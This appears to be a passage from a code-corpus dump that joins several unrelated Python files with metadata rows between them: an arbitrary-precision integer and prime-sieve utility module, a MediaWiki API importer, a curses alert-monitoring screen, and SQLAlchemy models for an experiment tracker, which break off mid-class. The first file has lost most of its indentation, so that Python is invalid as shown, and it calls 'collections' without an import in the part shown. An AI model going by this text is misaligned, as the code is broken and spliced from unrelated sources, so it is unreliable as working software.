# we need more kinds of skimming, at least two (i.e. the skim as we know it
# now for extreme cases, and a skim that I just described to cover cases
# where we know after topping off one time we know there are no others.)
class BigInt:
def __init__(self):
self.number = [0]
def skim(self):
carrier = 0
for i in range(len(self.number)):
self.number[i] += carrier
head = self.number[i] % 10
carrier = (self.number[i] - head) / 10
self.number[i] = int(head)
while carrier != 0:
head = carrier % 10
carrier = (carrier - head) / 10
self.number.append(int(head))
def add(self, factor):
self.number[0] += factor
        self.skim()
def mul(self, factor):
carry = 0
for i in range(len(self.number)):
self.number[i] *= factor
self.number[i] += carry
carry = 0
if self.number[i] > 9:
head = int(self.number[i] % 10)
carry = int((self.number[i] - head) / 10)
self.number[i] = head
while carry != 0:
head = carry % 10
carry = (carry - head) / 10
self.number.append(int(head))
def pow(self, factor):
if factor < 0:
raise NotImplementedError("Negative powers not supported")
if type(factor) == type(0.1) and not factor.is_integer():
raise NotImplementedError("Non-integer powers not supported")
if factor == 0:
            self.number = [1]
return
oldSelf = self.clone()
for _ in range(factor - 1):
self.bigMul(oldSelf)
def smartPow(self, factor):
# Inspired by: https://en.wikipedia.org/wiki/Exponentiation_by_squaring
if factor < 0:
raise NotImplementedError("Negative powers not supported")
if type(factor) == type(0.1) and not factor.is_integer():
raise NotImplementedError("Non-integer powers not supported")
if factor == 0:
            self.number = [1]
return
if factor == 1:
return
if (factor % 2) == 0:
# Even
self.bigMul(self)
self.smartPow(factor / 2)
else:
# Odd
oldSelf = self.clone()
self.bigMul(self)
self.smartPow((factor - 1) / 2)
self.bigMul(oldSelf)
def smartPowIt(self, factor):
# Inspired by: https://en.wikipedia.org/wiki/Exponentiation_by_squaring
if factor < 0:
raise NotImplementedError("Negative powers not supported")
if type(factor) == type(0.1) and not factor.is_integer():
raise NotImplementedError("Non-integer powers not supported")
if factor == 0:
            self.number = [1]
return
if factor == 1:
return
y = BigInt()
y.add(1)
while factor > 1:
if (factor % 2) == 0:
# Even
self.bigMul(self)
factor /= 2
else:
# Odd
y.bigMul(self)
self.bigMul(self)
factor = (factor - 1) / 2
self.bigMul(y)
def skimOne(self, i):
if self.number[i] > 9:
old = self.number[i]
self.number[i] = int(old % 10)
head = int((old - (old % 10)) / 10)
if i + 1 < len(self.number):
self.number[i + 1] += head
else:
self.number.append(head)
def bigAdd(self, bigInt):
# TODO: Self add does not work!
if len(self.number) < len(bigInt.number):
self.number += [0] * (len(bigInt.number) - len(self.number))
for (i, v) in enumerate(bigInt.number):
self.number[i] += bigInt.number[i]
self.skimOne(i)
# TODO: Bottleneck for smartpow is here!
# self.skim()
def bigMul(self, bigFactor):
# We can take the internal list because we construct a new list
# (in total)
# So even if we multiply with self this should still work out
total = BigInt()
# For each factor...
for (i, v) in enumerate(bigFactor.number):
            # If v is zero, skip it: this digit contributes nothing to the product
if v == 0:
continue
# Make a copy of the original
digitSelf = self.clone()
# Shift it the amount of places of the current digit
digitSelf.shift(i)
            # If v is greater than one, scale the shifted copy
if v > 1:
digitSelf.mul(v)
total.bigAdd(digitSelf)
# Set the end result
self.number = total.number
def getNumberArray(self):
return list(self.number)
def toString(self):
result = ""
for i in self.number:
result += str(i)
return result[::-1]
def clone(self):
newSelf = BigInt()
newSelf.number = self.getNumberArray()
return newSelf
def shift(self, n):
if n == 0:
return
if n < 0:
raise NotImplementedError("Negative shifts are not yet implemented")
oldLen = len(self.number)
self.number += [0] * n
for i in range(len(self.number) - 1, n - 1, -1):
self.number[i] = self.number[i - n]
self.number[i - n] = 0
def take(self, n):
        if n == 0:
            self.number = [0]
            return
        if n < 0:
            raise ValueError("Negative takes are not supported")
self.number = self.number[:n]
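# Illustrative note (not part of the original file): BigInt keeps its digits
# least-significant first, which is why toString() reverses the list.
def _bigint_digit_order_example():
    b = BigInt()
    b.add(120)
    return b.getNumberArray(), b.toString()  # ([0, 2, 1], '120')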
def generatePrimeTable(lim):
numbers = [True] * lim
numbers[0] = False
numbers[1] = False
currNum = 4
while currNum < lim:
numbers[currNum] = False
currNum += 2
prime = 3
while prime < lim:
if numbers[prime]:
currNum = prime
currNum += prime
while currNum < lim:
numbers[currNum] = False
currNum += prime
prime += 2
return numbers
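# Illustrative helper (not part of the original file): collapse the sieve's
# boolean table into the primes themselves.
def _primes_below(lim):
    return [i for i, is_prime in enumerate(generatePrimeTable(lim)) if is_prime]
# _primes_below(12) == [2, 3, 5, 7, 11]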
class NumberJuggler:
def __init__(self, lim):
print("Generating prime lookup table")
self.primeTable = generatePrimeTable(lim)
print("Generating prime list")
self.primeList = [i for i, b in enumerate(self.primeTable) if b]
print("Finished initializing number juggler")
def getFactorization(self, num):
factorisation = collections.defaultdict(int)
countdown = num
for prime in self.primeList:
if countdown == 1: break
while countdown % prime == 0:
countdown = countdown // prime
factorisation[prime] += 1
return factorisation
def getFactors(self, num):
factorisation = self.getFactorization(num)
result = []
for k, v in factorisation.items():
result.extend([k] * v)
return result
def getPrimeFactors(self, num):
return list(self.getFactorization(num).keys())
def getDivisors(self, num):
if num == 1: return [1]
factorization = self.getFactorization(num)
factors = list(factorization.keys())
factorCounts = [0] * len(factors)
factorCounts[0] = 1
run = True
divisors = [1]
while run:
            divisor = 1
for j in range(0, len(factors)):
if factorCounts[j] != 0:
divisor *= factors[j]**factorCounts[j]
if divisor != num:
divisors.append(divisor)
factorCounts[0] += 1
for j in range(0, len(factorCounts)):
if factorCounts[j] == factorization[factors[j]] + 1:
if j == len(factorCounts) - 1:
run = False
break
else:
                        factorCounts[j] = 0
factorCounts[j + 1] += 1
return divisors
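# Illustrative usage (not part of the original file), assuming a NumberJuggler
# built with a limit above the numbers being factored: getDivisors returns the
# proper divisors, so a perfect number sums back to itself.
def _is_perfect(nj, num):
    return sum(nj.getDivisors(num)) == num  # _is_perfect(NumberJuggler(100), 28) -> True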
def mergeSort(array):
if len(array) <= 1:
return array[:]
else:
mid = len(array) // 2
left = mergeSort(array[:mid])
right = mergeSort(array[mid:])
result = []
while len(left) > 0 and len(right) > 0:
if left[0] < right[0]:
result.append(left.pop(0))
else:
result.append(right.pop(0))
if len(left) > 0:
result.extend(left)
elif len(right) > 0:
result.extend(right)
return result
def removeDupsOrdered(array):
prev = array[0]
result = [prev]
for e in array[1:]:
if e != prev:
prev = e
result.append(e)
return result
def simplifyFraction(nj, numerator, denominator):
if denominator == 0:
return (0, 0)
if numerator == 0:
return (0, 0)
numFactors = nj.getFactors(numerator)
denFactors = nj.getFactors(denominator)
i = 0
while i < len(denFactors):
currFactor = denFactors[i]
if currFactor in denFactors and currFactor in numFactors:
denFactors.remove(currFactor)
numFactors.remove(currFactor)
else:
i += 1
newNumerator = 1
for f in numFactors:
newNumerator *= f
newDenominator = 1
for f in denFactors:
newDenominator *= f
return (newNumerator, newDenominator)
def isPandigital(num):
numStr = str(num)
seen = [False] * len(numStr)
total = 0
for c in numStr:
cInt = int(c)
if cInt < 1 or cInt > len(numStr):
total = -1
break
if not seen[cInt - 1]:
total += 1
seen[cInt - 1] = True
else:
total = -1
break
return total == len(numStr)
def generatePermutations(elements):
allPerms = []
if len(elements) == 1:
return [elements]
for i in range(0, len(elements)):
lessElements = list(elements)
del lessElements[i]
partialPerms = generatePermutations(lessElements)
for perm in partialPerms:
allPerms.append([elements[i]] + perm)
return allPerms
if __name__ == "__main__":
print("Unit testing!")
print("Tests for BigInt")
bi = BigInt()
bi.add(123)
assert(bi.toString() == "123")
bi.shift(3)
assert(bi.toString() == "123000")
bi = BigInt()
bi.add(50)
bi.mul(5)
# print(bi.toString())
assert(bi.toString() == "250")
ba = BigInt()
ba.add(200)
bb = BigInt()
bb.add(12345)
bb.bigAdd(ba)
assert(bb.toString() == str(12345 + 200))
ba = BigInt()
ba.add(12345)
bb = BigInt()
bb.add(67890)
bb.bigMul(ba)
assert(bb.toString() == str(12345 * 67890))
ba = BigInt()
ba.add(3)
bb = BigInt()
bb.add(3)
ba.bigMul(bb)
ba.bigMul(bb)
assert(ba.toString() == "27")
bi = BigInt()
bi.add(3)
bi.pow(3)
assert(bi.toString() == "27")
bi = BigInt()
bi.add(80)
bi.pow(80)
assert(bi.toString() == str(80 ** 80))
bi = BigInt()
bi.add(3)
bi.smartPow(3)
assert(bi.toString() == "27")
bi = BigInt()
bi.add(80)
bi.smartPow(80)
assert(bi.toString() == str(80 ** 80))
bi = BigInt()
bi.add(3)
bi.smartPowIt(3)
assert(bi.toString() == "27")
bi = BigInt()
bi.add(80)
bi.smartPowIt(80)
assert(bi.toString() == str(80 ** 80))
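    # Additional illustrative checks (not in the original file) for the other
    # helpers defined above.
    assert(mergeSort([3, 1, 2]) == [1, 2, 3])
    assert(removeDupsOrdered([1, 1, 2, 2, 3]) == [1, 2, 3])
    assert(isPandigital(2143))
    assert(not isPandigital(1233))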
|
mit
| 5,004,734,104,982,722,000
| 24.096639
| 80
| 0.495089
| false
| 3.957311
| false
| false
| false
|
projectgus/yamdwe
|
mediawiki.py
|
1
|
7964
|
"""
Methods for importing mediawiki pages, images via the simplemediawki
wrapper to the MediaWiki API.
Copyright (C) 2014 Angus Gratton
Licensed under New BSD License as described in the file LICENSE.
"""
from __future__ import print_function, unicode_literals, absolute_import, division
import simplemediawiki, simplejson
import re
from pprint import pprint
class Importer(object):
def __init__(self, api_url, http_user=None, http_pass="", wiki_user=None, wiki_pass="", wiki_domain=None, verbose=False):
self.verbose = verbose
if wiki_domain:
self.mw = simplemediawiki.MediaWiki(api_url, http_user=http_user, http_password=http_pass, domain=wiki_domain)
else:
self.mw = simplemediawiki.MediaWiki(api_url, http_user=http_user, http_password=http_pass)
# login if necessary
if wiki_user is not None:
print("Logging in as %s..." % wiki_user)
if not self.mw.login(wiki_user, wiki_pass):
raise RuntimeError("Mediawiki login failed. Wrong credentials?")
# version check
try:
self.need_rawcontinue = False
generator = "".join(self._query({'meta' : 'siteinfo'}, ['general', 'generator']))
version = [ int(x) for x in re.search(r'[0-9.]+', generator).group(0).split(".") ] # list of [ 1, 19, 1 ] or similar
if version[0] == 1 and version[1] < 13:
raise RuntimeError("Mediawiki version is too old. Yamdwe requires 1.13 or newer. This install is %s" % generator)
            # check whether the version is new enough to need the 'rawcontinue' parameter
# see https://www.mediawiki.org/wiki/API:Query#Backwards_compatibility_of_continue
self.need_rawcontinue = version[0] > 1 or (version[0] == 1 and version[1] >= 24)
print("%s meets version requirements." % generator)
except IndexError:
raise RuntimeError("Failed to read Mediawiki siteinfo/generator. Is version older than 1.8? Yamdwe requires 1.13 or greater.")
def verbose_print(self, msg):
if self.verbose:
print(msg)
def get_all_pages(self):
"""
Slurp all pages down from the mediawiki instance, together with all revisions including content.
WARNING: Hits API hard, don't do this without knowledge/permission of wiki operator!!
"""
query = {'list' : 'allpages'}
print("Getting list of pages...")
pages = self._query(query, [ 'allpages' ])
self.verbose_print("Got %d pages." % len(pages))
print("Query page revisions (this may take a while)...")
for page in pages:
self.verbose_print("Querying revisions for pageid %s (%s)..." % (page['pageid'], page['title']))
page["revisions"] = self._get_revisions(page)
self.verbose_print("Got %d revisions." % len(page["revisions"]))
return pages
def _get_revisions(self, page):
pageid = page['pageid']
query = { 'prop' : 'revisions',
'pageids' : pageid,
'rvprop' : 'timestamp|user|comment|content',
'rvlimit' : '5',
}
revisions = self._query(query, [ 'pages', str(pageid), 'revisions' ])
return revisions
def get_all_images(self):
"""
Slurp all images down from the mediawiki instance, latest revision of each image, only.
WARNING: Hits API hard, don't do this without knowledge/permission of wiki operator!!
"""
query = {'list' : 'allimages'}
return self._query(query, [ 'allimages' ])
def get_all_users(self):
"""
Slurp down all usernames from the mediawiki instance.
"""
query = {'list' : 'allusers'}
return self._query(query, [ 'allusers' ])
def _query(self, args, path_to_result):
"""
Make a Mediawiki API query that results a list of results,
handle the possibility of making a paginated query using query-continue
"""
query = { 'action' : 'query' }
if self.need_rawcontinue:
query["rawcontinue"] = ""
query.update(args)
result = []
continuations = 0
while True:
try:
response = self.mw.call(query)
except simplejson.scanner.JSONDecodeError as e:
if e.pos == 0:
if not self.verbose:
raise RuntimeError("Mediawiki gave us back a non-JSON response. You may need to double-check the Mediawiki API URL you are providing (it usually ends in api.php), and also your Mediawiki permissions. To see the response content, pass the --verbose flag to yamdwe.")
else:
raise RuntimeError("Mediawiki gave us back a non-JSON response:\n\n\nInvalid response follows (%d bytes):\n%s\n\n(End of content)\nFailed to parse. You may need to double-check the Mediawiki API URL you are providing (it usually ends in api.php), and also your Mediawiki permissions." % (len(e.doc), e.doc.decode("utf-8")))
raise
# fish around in the response for our actual data (location depends on query)
try:
inner = response['query']
for key in path_to_result:
inner = inner[key]
except KeyError:
raise RuntimeError("Mediawiki query '%s' returned unexpected response '%s' after %d continuations" % (args, response, continuations))
result += inner
# if there's a warning print it out (shouldn't need a debug flag since this is of interest to any user)
if 'warnings' in response:
for warnkey in response['warnings']:
print("WARNING: %s function throws the warning %s" % (warnkey, response['warnings'][warnkey]['*']))
# if there's a continuation, find the new arguments and follow them
try:
query.update(response['query-continue'][path_to_result[-1]])
continuations += 1
except KeyError:
return result
def get_file_namespaces(self):
"""
Return a tuple. First entry is the name used by default for the file namespace (which dokuwiki will also use.)
Second entry is a list of all aliases used for that namespace, and aliases used for the 'media' namespace.
"""
query = { 'action' : 'query', 'meta' : 'siteinfo', 'siprop' : 'namespaces|namespacealiases' }
result = self.mw.call(query)['query']
namespaces = result['namespaces'].values()
aliases = result.get('namespacealiases', {})
file_namespace = {'*' : 'Files', 'canonical' : 'File'}
media_namespace = {'*' : 'Media', 'canonical' : 'Media'}
# search for the File namespace
for namespace in namespaces:
if namespace.get('canonical', None) == 'File':
file_namespace = namespace
elif namespace.get('canonical', None) == 'Media':
media_namespace = namespace
# alias list starts with the file & media namespace canonical values, and the media "real" value
aliases_result = [ file_namespace['canonical'], media_namespace['canonical'], media_namespace['*'] ]
# look for any aliases by searching the file namespace id, add to the list
ids = [ file_namespace.get('id', None), media_namespace.get('id', None) ]
for alias in aliases:
if alias['id'] in ids:
aliases_result.append(alias['*'])
return file_namespace['*'], aliases_result
def get_main_pagetitle(self):
"""
Return the title of the main Mediawiki page
"""
query = { 'action' : 'query', 'meta' : 'siteinfo', 'siprop' : 'general' }
result = self.mw.call(query)['query']
return result['general'].get("mainpage", "Main")
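# Illustrative sketch (not part of the original module): a minimal export
# session against a wiki's api.php endpoint, using only the methods above.
def _example_dump(api_url, wiki_user=None, wiki_pass=""):
    importer = Importer(api_url, wiki_user=wiki_user, wiki_pass=wiki_pass, verbose=True)
    pages = importer.get_all_pages()            # pages with their recent revisions
    images = importer.get_all_images()          # latest revision of each image
    file_namespace, aliases = importer.get_file_namespaces()
    return pages, images, file_namespace, aliases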
|
bsd-3-clause
| 6,800,407,379,736,151,000
| 48.465839
| 345
| 0.596936
| false
| 4.200422
| false
| false
| false
|
alerta/python-alerta-client
|
alertaclient/top.py
|
1
|
5079
|
import curses
import sys
import time
from curses import wrapper
from datetime import datetime
from alertaclient.models.alert import Alert
from alertaclient.utils import DateTime
class Screen:
ALIGN_RIGHT = 'R'
ALIGN_CENTRE = 'C'
def __init__(self, client, timezone):
self.client = client
self.timezone = timezone
self.screen = None
self.lines = None
self.cols = None
def run(self):
wrapper(self.main)
def main(self, stdscr):
self.screen = stdscr
curses.use_default_colors()
curses.init_pair(1, curses.COLOR_RED, -1)
curses.init_pair(2, curses.COLOR_MAGENTA, -1)
curses.init_pair(3, curses.COLOR_YELLOW, -1)
curses.init_pair(4, curses.COLOR_BLUE, -1)
curses.init_pair(5, curses.COLOR_CYAN, -1)
curses.init_pair(6, curses.COLOR_GREEN, -1)
curses.init_pair(7, curses.COLOR_WHITE, curses.COLOR_BLACK)
COLOR_RED = curses.color_pair(1)
COLOR_MAGENTA = curses.color_pair(2)
COLOR_YELLOW = curses.color_pair(3)
COLOR_BLUE = curses.color_pair(4)
COLOR_CYAN = curses.color_pair(5)
COLOR_GREEN = curses.color_pair(6)
COLOR_BLACK = curses.color_pair(7)
self.SEVERITY_MAP = {
'security': ['Sec', COLOR_BLACK],
'critical': ['Crit', COLOR_RED],
'major': ['Majr', COLOR_MAGENTA],
'minor': ['Minr', COLOR_YELLOW],
'warning': ['Warn', COLOR_BLUE],
'indeterminate': ['Ind ', COLOR_CYAN],
'cleared': ['Clr', COLOR_GREEN],
'normal': ['Norm', COLOR_GREEN],
'ok': ['Ok', COLOR_GREEN],
'informational': ['Info', COLOR_GREEN],
'debug': ['Dbug', COLOR_BLACK],
'trace': ['Trce', COLOR_BLACK],
'unknown': ['Unkn', COLOR_BLACK]
}
self.screen.keypad(1)
self.screen.nodelay(1)
while True:
self.update()
event = self.screen.getch()
if 0 < event < 256:
self._key_press(chr(event))
else:
if event == curses.KEY_RESIZE:
self.update()
time.sleep(2)
def update(self):
self.lines, self.cols = self.screen.getmaxyx()
self.screen.clear()
now = datetime.utcnow()
status = self.client.mgmt_status()
version = status['version']
# draw header
self._addstr(0, 0, self.client.endpoint, curses.A_BOLD)
self._addstr(0, 'C', f'alerta {version}', curses.A_BOLD)
self._addstr(0, 'R', '{}'.format(now.strftime('%H:%M:%S %d/%m/%y')), curses.A_BOLD)
# TODO - draw bars
# draw alerts
text_width = self.cols - 95 if self.cols >= 95 else 0
self._addstr(2, 1, 'Sev. Time Dupl. Customer Env. Service Resource Group Event'
+ ' Value Text' + ' ' * (text_width - 4), curses.A_UNDERLINE)
def short_sev(severity):
return self.SEVERITY_MAP.get(severity, self.SEVERITY_MAP['unknown'])[0]
def color(severity):
return self.SEVERITY_MAP.get(severity, self.SEVERITY_MAP['unknown'])[1]
r = self.client.http.get('/alerts')
alerts = [Alert.parse(a) for a in r['alerts']]
last_time = DateTime.parse(r['lastTime'])
for i, alert in enumerate(alerts):
row = i + 3
if row >= self.lines - 2: # leave room for footer
break
text = '{:<4} {} {:5d} {:8.8} {:<12} {:<12} {:<12.12} {:5.5} {:<12.12} {:<5.5} {:.{width}}'.format(
short_sev(alert.severity),
DateTime.localtime(alert.last_receive_time, self.timezone, fmt='%H:%M:%S'),
alert.duplicate_count,
alert.customer or '-',
alert.environment,
','.join(alert.service),
alert.resource,
alert.group,
alert.event,
alert.value or 'n/a',
alert.text,
width=text_width
)
# XXX - needed to support python2 and python3
if not isinstance(text, str):
text = text.encode('ascii', errors='replace')
self._addstr(row, 1, text, color(alert.severity))
# draw footer
self._addstr(self.lines - 1, 0, 'Last Update: {}'.format(last_time.strftime('%H:%M:%S')), curses.A_BOLD)
self._addstr(self.lines - 1, 'C', '{} - {}'.format(r['status'], r.get('message', 'no errors')), curses.A_BOLD)
self._addstr(self.lines - 1, 'R', 'Count: {}'.format(r['total']), curses.A_BOLD)
self.screen.refresh()
def _addstr(self, y, x, line, attr=0):
if x == self.ALIGN_RIGHT:
x = self.cols - len(line) - 1
if x == self.ALIGN_CENTRE:
x = int((self.cols / 2) - len(line) / 2)
self.screen.addstr(y, x, line, attr)
def _key_press(self, key):
if key in 'qQ':
sys.exit(0)
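# Illustrative sketch (not part of the original module): the screen is driven
# by an alerta API client and a timezone name; the Client import path below is
# the package's usual one but is stated here as an assumption.
def _example_top(endpoint='http://localhost:8080', timezone='Europe/London'):
    from alertaclient.api import Client  # assumed import path
    Screen(client=Client(endpoint=endpoint), timezone=timezone).run()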
|
apache-2.0
| 1,558,769,885,894,008,600
| 33.087248
| 118
| 0.525103
| false
| 3.476386
| false
| false
| false
|
ikinsella/squall
|
flaskapp/squall/models.py
|
1
|
32913
|
import os
import shutil
import json
import yaml
import zipfile
import re
from flask import (render_template, current_app)
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import (UserMixin, AnonymousUserMixin)
from werkzeug.security import (generate_password_hash, check_password_hash)
from sqlalchemy.ext.hybrid import hybrid_property
from flask.ext.pymongo import PyMongo
db = SQLAlchemy()
mongo = PyMongo()
""" Tables For Many To Many Relationships """
""" TODO : Multi-User
users_tags = db.Table(
'users_tags',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
"""
algorithms_experiments = db.Table(
'algorithms_experiments',
db.Column('experiment_id', db.Integer, db.ForeignKey('experiment.id')),
db.Column('algorithm_id', db.Integer, db.ForeignKey('algorithm.id')))
algorithms_tags = db.Table(
'algorithms_tags',
db.Column('algorithm_id', db.Integer, db.ForeignKey('algorithm.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
implementations_tags = db.Table(
'implementations_tags',
db.Column('implementation_id', db.Integer,
db.ForeignKey('implementation.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
collections_experiments = db.Table(
'collections_experiments',
db.Column('experiment_id', db.Integer, db.ForeignKey('experiment.id')),
db.Column('collection_id', db.Integer,
db.ForeignKey('data_collection.id')))
collections_tags = db.Table(
'collections_tags',
db.Column('data_collection_id', db.Integer,
db.ForeignKey('data_collection.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
data_sets_tags = db.Table(
'data_sets_tags',
db.Column('data_set_id', db.Integer, db.ForeignKey('data_set.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
experiments_tags = db.Table(
'experiments_tags',
db.Column('experiment_id', db.Integer, db.ForeignKey('experiment.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
batches_tags = db.Table(
'batches_tags',
db.Column('batch_id', db.Integer, db.ForeignKey('batch.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')))
""" Entities """
class User(db.Model, UserMixin):
"""Represents a single User who has access to the application"""
# Fields
id = db.Column(db.Integer(), primary_key=True)
_launch_directory = db.Column(db.String(128))
username = db.Column(db.String(64))
password = db.Column(db.String(64))
""" TODO: Multi-User
_tags = db.relationship('Tag', secondary=users_tags,
backref=db.backref('users',
lazy='dynamic'))
"""
# relationships
""" TODO: Multi-User
algorithms = db.relationship()
datacollections = db.relationship()
experiments = db.relationship()
batches = db.relationship()
tags = db.relationship()
"""
def __init__(self, username, launch_directory, password):
self.username = username
self._launch_directory = launch_directory
self.set_password(password)
def __repr__(self):
return '<User {username}>'.format(username=self.username)
def set_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, value):
return check_password_hash(self.password, value)
def get_id(self):
return unicode(self.id)
@property
def is_authenticated(self):
if isinstance(self, AnonymousUserMixin):
return False
else:
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
if isinstance(self, AnonymousUserMixin):
return True
else:
return False
@hybrid_property
def launch_directory(self):
return self._launch_directory
@launch_directory.setter
def launch_directory(self, value):
self._launch_directory = value
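# Illustrative note (not part of the original model): passwords are stored as
# salted werkzeug hashes, so verification goes through check_password rather
# than string comparison; the credentials below are hypothetical.
#   u = User('alice', '/tmp/launch', 's3cret')
#   u.check_password('s3cret')  # True
#   u.check_password('wrong')   # False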
class Tag(db.Model):
"""Represents a tag which is used to add query-able meta data
to experiments, batches, data collections, data sets, algorithms,
and implementations. A User defines tags in a view and each collected
job is associated with all the tags contained in its hierarchy."""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
# Relationships
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
def __init__(self, name):
super(Tag, self).__init__()
self._name = name
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
class Algorithm(db.Model):
""" Entity representing a single algorithm used in a an experiment """
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=algorithms_tags,
backref=db.backref('algorithms', lazy='dynamic'))
_implementations = db.relationship('Implementation', backref='algorithm',
lazy='dynamic')
def __init__(self, name, description, tags):
self._name = name
self._description = description
self._tags = tags
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def implementations(self):
return self._implementations
@implementations.setter
def implementations(self, value):
self._implementations.append(value)
class Implementation(db.Model):
"""Represents a single implementation of an algorithm"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
_setup_scripts = db.Column(db.PickleType(), index=False, unique=False)
_executable = db.Column(db.String(64), index=False, unique=False)
# Relationships
_algorithm_id = db.Column(db.Integer, db.ForeignKey('algorithm.id'))
""" TODO: Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=implementations_tags,
backref=db.backref('implementations',
lazy='dynamic'))
_urls = db.relationship('URL', backref='implementation', lazy='select')
_batches = db.relationship('Batch', backref='implementation',
lazy='dynamic')
""" TODO: Parameter Validation
_arguments = db.relationship('Argument',
backref='implementation',
lazy='dynamic')
"""
def __init__(self,
algorithm_id,
name,
description,
tags,
urls,
setup_scripts,
executable):
self._algorithm_id = algorithm_id
self._name = name
self._description = description
self._tags = tags
self._urls = [URL(url, implementation_id=self.id) for url in urls]
self._setup_scripts = setup_scripts
self._executable = executable
# self._arguments = arguments # TODO: Parameter Validation
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def urls(self):
return [url.url for url in self._urls]
@urls.setter
def urls(self, value):
self._urls.append(URL(value, implementation_id=self.id))
@hybrid_property
def setup_scripts(self):
return self._setup_scripts
@setup_scripts.setter
def setup_scripts(self, value):
self._setup_scripts.append(value)
@hybrid_property
def executable(self):
return self._executable
@executable.setter
def executable(self, value):
self._executable = value
@hybrid_property
def batches(self):
return self._batches
@batches.setter
def batches(self, value):
self._batches.append(value)
""" TODO: Parameter Validation
@hybrid_property
def arguments(self):
return self._arguments
@arguments.setter
def arguments(self, value):
self._arguments.append(value)
"""
class DataCollection(db.Model):
"""Represents a collection of datasets derived from a common source"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
""" TODO: Moving To Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=collections_tags,
backref=db.backref('data_collections',
lazy='dynamic'))
_data_sets = db.relationship('DataSet', backref='data_collection',
lazy='dynamic')
def __init__(self, name, description, tags):
super(DataCollection, self).__init__()
self._name = name
self._description = description
self._tags = tags
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def data_sets(self):
return self._data_sets
@data_sets.setter
def data_sets(self, value):
self._data_sets.append(value)
class DataSet(db.Model):
"""Represents a single dataset belonging to a data collection"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
""" TODO: Moving To Multi-User
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
data_collection_id = db.Column(
db.Integer, db.ForeignKey('data_collection.id'))
_tags = db.relationship('Tag', secondary=data_sets_tags,
backref=db.backref('data_sets', lazy='dynamic'))
_urls = db.relationship('URL', backref='data_set', lazy='select')
_batches = db.relationship('Batch', backref='data_set', lazy='dynamic')
def __init__(self, data_collection_id, name, description, tags, urls):
super(DataSet, self).__init__()
self.data_collection_id = data_collection_id
self._name = name
self._description = description
self._tags = tags
self._urls = [URL(url, data_set_id=self.id) for url in urls]
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@hybrid_property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@hybrid_property
def tags(self):
return self._tags
@tags.setter
def tags(self, value):
self._tags.append(value)
@hybrid_property
def urls(self):
return [url.url for url in self._urls]
@urls.setter
def urls(self, value):
self._urls.append(URL(value, data_set_id=self.id))
@hybrid_property
def batches(self):
return self._batches
@batches.setter
def batches(self, value):
self._batches.append(value)
class Experiment(db.Model):
"""Represents an experiment composed of data collections and algorithms"""
# Fields
id = db.Column(db.Integer, primary_key=True)
_name = db.Column(db.String(64), index=True, unique=True)
_description = db.Column(db.String(512), index=False, unique=False)
# Relationships
"""
Moving To Multi-User TODO:
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
"""
_tags = db.relationship('Tag', secondary=experiments_tags,
backref=db.backref('experiments', lazy='dynamic'))
_algorithms = db.relationship('Algorithm',
secondary=algorithms_experiments,
backref=db.backref('experiments',
lazy='dynamic'))
_collections = db.relationship('DataCollection',
secondary=collections_experiments,
backref=db.backref('experiments',
lazy='dynamic'))
_batches = db.relationship('Batch', backref='experiment', lazy='dynamic')
def __init__(self, name, description, tags, algorithms, collections):
super(Experiment, self).__init__()
self._name = name
self._description = description
self._tags = tags
self._algorithms = algorithms
self._collections = collections
@hybrid_property
def serialize(self):
return {'Name': self.name,
'Tags': [tag.name for tag in self.tags]}
@hybrid_property
def name(self):
return self._name
@name.setter
